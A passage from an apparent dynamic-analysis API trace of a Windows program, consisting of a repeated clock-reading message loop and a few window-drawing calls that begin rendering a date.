wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x160)) [0106.611] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x160)) [0106.611] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0106.622] TranslateMessage (lpMsg=0x2347a14) returned 0 [0106.622] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0106.622] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x16b)) [0106.622] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x16b)) [0106.622] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0106.642] TranslateMessage (lpMsg=0x2347a14) returned 0 [0106.642] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0106.642] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x17f)) [0106.642] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x17f)) [0106.642] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0106.653] TranslateMessage (lpMsg=0x2347a14) returned 0 [0106.653] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0106.653] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x18a)) [0106.653] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x18b)) [0106.653] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0106.669] TranslateMessage (lpMsg=0x2347a14) returned 0 [0106.669] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0106.669] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x19a)) [0106.669] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x19a)) [0106.669] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0106.688] TranslateMessage (lpMsg=0x2347a14) returned 0 [0106.689] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0106.689] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x1ae)) [0106.689] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x1ae)) [0106.689] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0106.711] TranslateMessage (lpMsg=0x2347a14) returned 0 [0106.711] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0106.711] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x1c4)) [0106.711] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x1c4)) [0106.711] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0106.715] TranslateMessage (lpMsg=0x2347a14) returned 0 [0106.716] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0106.716] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x1c9)) [0106.716] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x1c9)) [0106.716] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0106.739] TranslateMessage (lpMsg=0x2347a14) returned 0 [0106.739] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0106.739] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x1e0)) [0106.740] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x1e1)) [0106.740] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0106.751] TranslateMessage (lpMsg=0x2347a14) returned 0 [0106.751] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0106.751] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x1ec)) [0106.751] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x1ec)) [0106.751] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0106.762] TranslateMessage (lpMsg=0x2347a14) returned 0 [0106.762] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0106.762] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x1f7)) [0106.762] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x1f7)) [0106.762] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0106.780] TranslateMessage (lpMsg=0x2347a14) returned 0 [0106.780] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0106.780] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x209)) [0106.780] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x209)) [0106.780] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0106.792] TranslateMessage (lpMsg=0x2347a14) returned 0 [0106.792] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0106.792] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x216)) [0106.792] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x216)) [0106.793] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0106.820] TranslateMessage (lpMsg=0x2347a14) returned 0 [0106.821] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0106.821] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x232)) [0106.821] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x232)) [0106.821] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0106.825] TranslateMessage (lpMsg=0x2347a14) returned 0 [0106.825] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0106.825] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x236)) [0106.825] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x236)) [0106.825] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0106.922] TranslateMessage (lpMsg=0x2347a14) returned 0 [0106.922] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0106.922] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x297)) [0106.922] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x297)) [0106.922] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0106.932] TranslateMessage (lpMsg=0x2347a14) returned 0 [0106.932] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0106.932] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x2a1)) [0106.932] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x2a1)) [0106.932] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0106.953] TranslateMessage (lpMsg=0x2347a14) returned 0 [0106.953] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0106.953] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x2b6)) [0106.953] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x2b6)) [0106.953] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0106.970] TranslateMessage (lpMsg=0x2347a14) returned 0 [0106.970] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0106.970] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x2c7)) [0106.970] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x2c7)) [0106.970] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0106.979] TranslateMessage (lpMsg=0x2347a14) returned 0 [0106.979] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0106.979] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x2d0)) [0106.979] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x2d0)) [0106.979] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0107.006] TranslateMessage (lpMsg=0x2347a14) returned 0 [0107.006] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0107.006] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x2eb)) [0107.006] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x2eb)) [0107.006] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0107.020] TranslateMessage (lpMsg=0x2347a14) returned 0 [0107.020] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0107.020] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x2f9)) [0107.020] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x2fa)) [0107.021] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0107.028] TranslateMessage (lpMsg=0x2347a14) returned 0 [0107.028] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0107.028] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x301)) [0107.028] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x302)) [0107.028] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0107.067] TranslateMessage (lpMsg=0x2347a14) returned 0 [0107.067] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0107.067] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x328)) [0107.067] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x328)) [0107.067] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0107.080] TranslateMessage (lpMsg=0x2347a14) returned 0 [0107.080] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0107.080] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x335)) [0107.080] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x335)) [0107.080] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0107.090] TranslateMessage (lpMsg=0x2347a14) returned 0 [0107.090] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0107.090] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x33f)) [0107.090] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x33f)) [0107.090] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0107.108] TranslateMessage (lpMsg=0x2347a14) returned 0 [0107.108] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0107.109] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x352)) [0107.109] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x352)) [0107.109] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0107.122] TranslateMessage (lpMsg=0x2347a14) returned 0 [0107.122] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0107.122] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x35f)) [0107.122] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x360)) [0107.122] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0107.147] TranslateMessage (lpMsg=0x2347a14) returned 0 [0107.147] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0107.147] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x378)) [0107.147] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x378)) [0107.147] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0107.151] TranslateMessage (lpMsg=0x2347a14) returned 0 [0107.151] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0107.151] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x37c)) [0107.151] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x37d)) [0107.151] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0107.172] TranslateMessage (lpMsg=0x2347a14) returned 0 [0107.172] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0107.172] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x391)) [0107.172] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x392)) [0107.172] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0107.183] TranslateMessage (lpMsg=0x2347a14) returned 0 [0107.183] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0107.183] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x39c)) [0107.183] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x39c)) [0107.183] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0107.204] TranslateMessage (lpMsg=0x2347a14) returned 0 [0107.204] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0107.204] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x3b1)) [0107.204] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x3b1)) [0107.204] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0107.214] TranslateMessage (lpMsg=0x2347a14) returned 0 [0107.214] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0107.214] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x3bb)) [0107.214] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x3bc)) [0107.214] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0107.236] TranslateMessage (lpMsg=0x2347a14) returned 0 [0107.236] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0107.236] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x3d1)) [0107.236] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x24, wMilliseconds=0x3d1)) [0107.236] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0107.279] TranslateMessage (lpMsg=0x2347a14) returned 0 [0107.280] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0107.280] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x15)) [0107.280] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x15)) [0107.280] InvalidateRect (hWnd=0x402fa, lpRect=0x19f5c0, bErase=0) returned 1 [0107.280] GetDC (hWnd=0x0) returned 0xa0100d0 [0107.281] MoveToEx (in: hdc=0xa0100d0, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0107.281] SelectObject (hdc=0xa0100d0, h=0x280a099b) returned 0x18a0048 [0107.281] GetSysColor (nIndex=8) returned 0x0 [0107.281] SetTextColor (hdc=0xa0100d0, color=0x0) returned 0x0 [0107.281] SelectObject (hdc=0xa0100d0, h=0x193009a9) returned 0x1b00017 [0107.281] SetROP2 (hdc=0xa0100d0, rop2=13) returned 13 [0107.281] UnrealizeObject (h=0x2d10099f) returned 1 [0107.281] SelectObject (hdc=0xa0100d0, h=0x2d10099f) returned 0x1900010 [0107.281] SetBkColor (hdc=0xa0100d0, color=0xffffff) returned 0xffffff [0107.281] SetBkMode (hdc=0xa0100d0, mode=2) returned 2 [0107.281] DrawTextA (in: hdc=0xa0100d0, lpchText="8/5/2022 